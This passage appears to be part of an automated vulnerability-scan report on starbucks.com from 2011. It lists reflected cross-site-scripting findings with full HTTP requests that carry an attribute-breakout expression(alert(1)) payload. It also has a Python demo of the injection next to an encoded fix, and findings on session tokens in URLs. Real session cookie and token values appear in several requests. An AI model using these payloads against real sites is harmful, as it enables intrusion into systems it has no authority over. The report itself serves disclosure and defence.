...[SNIP]...

2.319. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe12b"style="x:expression(alert(1))"ef4935acaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&fe12b"style%3d"x%3aexpression(alert(1))"ef4935acaa=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:04:48 GMT
Content-Length: 33998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&fe12b"style="x:expression(alert(1))"ef4935acaa=1"/>
...[SNIP]...

2.320. http://www.starbucks.com/search/ [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search/

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 was submitted in the keywords parameter. This input was echoed as 88b3a"style="x:expression(alert(1))"e0f4f9251b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/?keywords=88b3a"style%3d"x%3aexpression(alert(1))"e0f4f9251b1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:20 GMT
Connection: close
Content-Length: 34078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords=88b3a"style="x:expression(alert(1))"e0f4f9251b1"/>
...[SNIP]...

2.321. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ed55"style="x:expression(alert(1))"89be0e08a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/?5ed55"style%3d"x%3aexpression(alert(1))"89be0e08a98=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:27:44 GMT
Connection: close
Content-Length: 33719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?5ed55"style="x:expression(alert(1))"89be0e08a98=1"/>
...[SNIP]...

2.322. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66b04"style="x:expression(alert(1))"eea619f23d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /site-map?66b04"style%3d"x%3aexpression(alert(1))"eea619f23d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:27:07 GMT
Connection: close
Content-Length: 92906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/site-map?66b04"style="x:expression(alert(1))"eea619f23d6=1"/>
...[SNIP]...

2.323. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62425"style%3d"x%3aexpression(alert(1))"fa95c58147d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62425"style="x:expression(alert(1))"fa95c58147d in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is evaluated only by Internet Explorer (and not by IE8 or later in standards mode), so this exact payload may not fire in other browsers; the attribute break-out itself is browser-independent, and whether a different payload fires depends on which other characters the application lets through unencoded.

Request

GET /smooth?62425"style%3d"x%3aexpression(alert(1))"fa95c58147d=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=tok1t2g1e4xui3idmv3cq43q; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:39 GMT
Content-Length: 35424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/smooth?62425"style="x:expression(alert(1))"fa95c58147d=1"/>
...[SNIP]...

2.324. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79d22"style="x:expression(alert(1))"59609b14b2a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is evaluated only by Internet Explorer (and not by IE8 or later in standards mode), so this exact payload may not fire in other browsers; the attribute break-out itself is browser-independent, and whether a different payload fires depends on which other characters the application lets through unencoded.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smooth/?79d22"style%3d"x%3aexpression(alert(1))"59609b14b2a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:29:16 GMT
Connection: close
Content-Length: 35424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/smooth?79d22"style="x:expression(alert(1))"59609b14b2a=1"/>
...[SNIP]...

2.325. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8188"style="x:expression(alert(1))"8d18f2f6526 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is evaluated only by Internet Explorer (and not by IE8 or later in standards mode), so this exact payload may not fire in other browsers; the attribute break-out itself is browser-independent, and whether a different payload fires depends on which other characters the application lets through unencoded.

Request

GET /store-locator?d8188"style%3d"x%3aexpression(alert(1))"8d18f2f6526=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:22 GMT
Connection: close
Content-Length: 39988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/store-locator?d8188"style="x:expression(alert(1))"8d18f2f6526=1"/>
...[SNIP]...

2.326. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff0ed"style="x:expression(alert(1))"b9ac111388f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is evaluated only by Internet Explorer (and not by IE8 or later in standards mode), so this exact payload may not fire in other browsers; the attribute break-out itself is browser-independent, and whether a different payload fires depends on which other characters the application lets through unencoded.

Request

GET /whats-new?ff0ed"style%3d"x%3aexpression(alert(1))"b9ac111388f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:25:48 GMT
Connection: close
Content-Length: 46436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?ff0ed"style="x:expression(alert(1))"b9ac111388f=1"/>
...[SNIP]...

2.327. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /card/set-auto-reload

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6593"style%3d"x%3aexpression(alert(1))"22e223ad474 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6593"style="x:expression(alert(1))"22e223ad474 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is evaluated only by Internet Explorer (and not by IE8 or later in standards mode), so this exact payload may not fire in other browsers; the attribute break-out itself is browser-independent, and whether a different payload fires depends on which other characters the application lets through unencoded.

Request

GET /card/set-auto-reload?c6593"style%3d"x%3aexpression(alert(1))"22e223ad474=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:32:52 GMT
Connection: close
Content-Length: 36061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="https://www.starbucks.com/card/set-auto-reload?c6593"style="x:expression(alert(1))"22e223ad474=1" />
...[SNIP]...
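Every reflected-XSS entry in section 2 has the same shape: the og:url meta tag is built from the raw request URL, so a double quote in a parameter name closes the content attribute and whatever follows becomes new attributes. The Python below is an added illustration, not code from the report or from the site: it reconstructs that behaviour under the assumption that the server concatenates the decoded request URL into the attribute (the real template is not shown), puts the HTML-attribute-encoded version beside it, and checks each output the way a browser's tokenizer would, by asking whether a separate style attribute carrying the payload has appeared. The probe markers are taken from entry 2.322; the BASE constant and the function names are this example's own.

```python
import html
from html.parser import HTMLParser

# Probe of the shape used throughout section 2: a random prefix, a double quote
# to close the attribute, a new style attribute, and a random suffix that makes
# the reflection easy to find. Markers copied from entry 2.322; the scanner sent
# the probe URL-encoded (%3d, %3a) and the server decoded it, so the functions
# below take the decoded parameter name.
PROBE_PREFIX = "66b04"
PROBE_SUFFIX = "eea619f23d6"
PAYLOAD = "x:expression(alert(1))"
PROBE = f'{PROBE_PREFIX}"style="{PAYLOAD}"{PROBE_SUFFIX}'

BASE = "http://www.starbucks.com"


def render_og_url_vulnerable(path: str, param_name: str) -> str:
    """Assumed server-side template (a reconstruction of the behaviour the
    report shows, not the site's real code): the request URL, query string
    included, is concatenated into the og:url content attribute unencoded."""
    return f'<meta property="og:url" content="{BASE}{path}?{param_name}=1"/>'


def render_og_url_fixed(path: str, param_name: str) -> str:
    """Same tag with the value HTML-attribute-encoded: a double quote in the
    parameter name becomes &quot; and can no longer close the attribute."""
    url = f"{BASE}{path}?{param_name}=1"
    return f'<meta property="og:url" content="{html.escape(url, quote=True)}"/>'


class _OgUrlTag(HTMLParser):
    """Records the attributes of the og:url meta tag as a tokenizer sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # attribute values arrive entity-decoded
        if tag == "meta" and attrs.get("property") == "og:url":
            self.attrs = attrs


def og_url_attributes(html_text: str) -> dict:
    parser = _OgUrlTag()
    parser.feed(html_text)
    parser.close()
    return parser.attrs


def attribute_injected(html_text: str) -> bool:
    """True when the probe escaped the quoted content attribute: the tokenizer
    then sees a separate style attribute carrying the payload, which is the
    condition behind the report's 'Certain' confidence."""
    return og_url_attributes(html_text).get("style") == PAYLOAD


if __name__ == "__main__":
    for label, render in (("vulnerable", render_og_url_vulnerable),
                          ("fixed", render_og_url_fixed)):
        page = render("/site-map", PROBE)
        print(f"{label}: {page}")
        print(f"  attributes seen: {og_url_attributes(page)}")
        print(f"  injected: {attribute_injected(page)}")
```

The check deliberately looks at parsed attributes rather than searching for the echoed string, because a reflection that has been encoded (`&quot;`) is harmless even though the marker text is still present. Encoding the attribute value is the fix; the same site generates og:url on every page, so the encoding belongs in the shared template, not in the individual handlers listed above.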

3. Session token in URL
There are 8 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://www.starbucks.com/about-us

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:16 GMT
Connection: close
Content-Length: 38374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.2. http://www.starbucks.com/about-us/company-information

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:52 GMT
Connection: close
Content-Length: 39059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.3. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/online-policies/privacy-statement HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:11 GMT
Connection: close
Content-Length: 52740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.4. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/online-policies/terms-of-use HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:20 GMT
Connection: close
Content-Length: 68702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

3.5. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us/company-information/online-policies/web-accessibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:55 GMT
Connection: close
Content-Length: 39158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
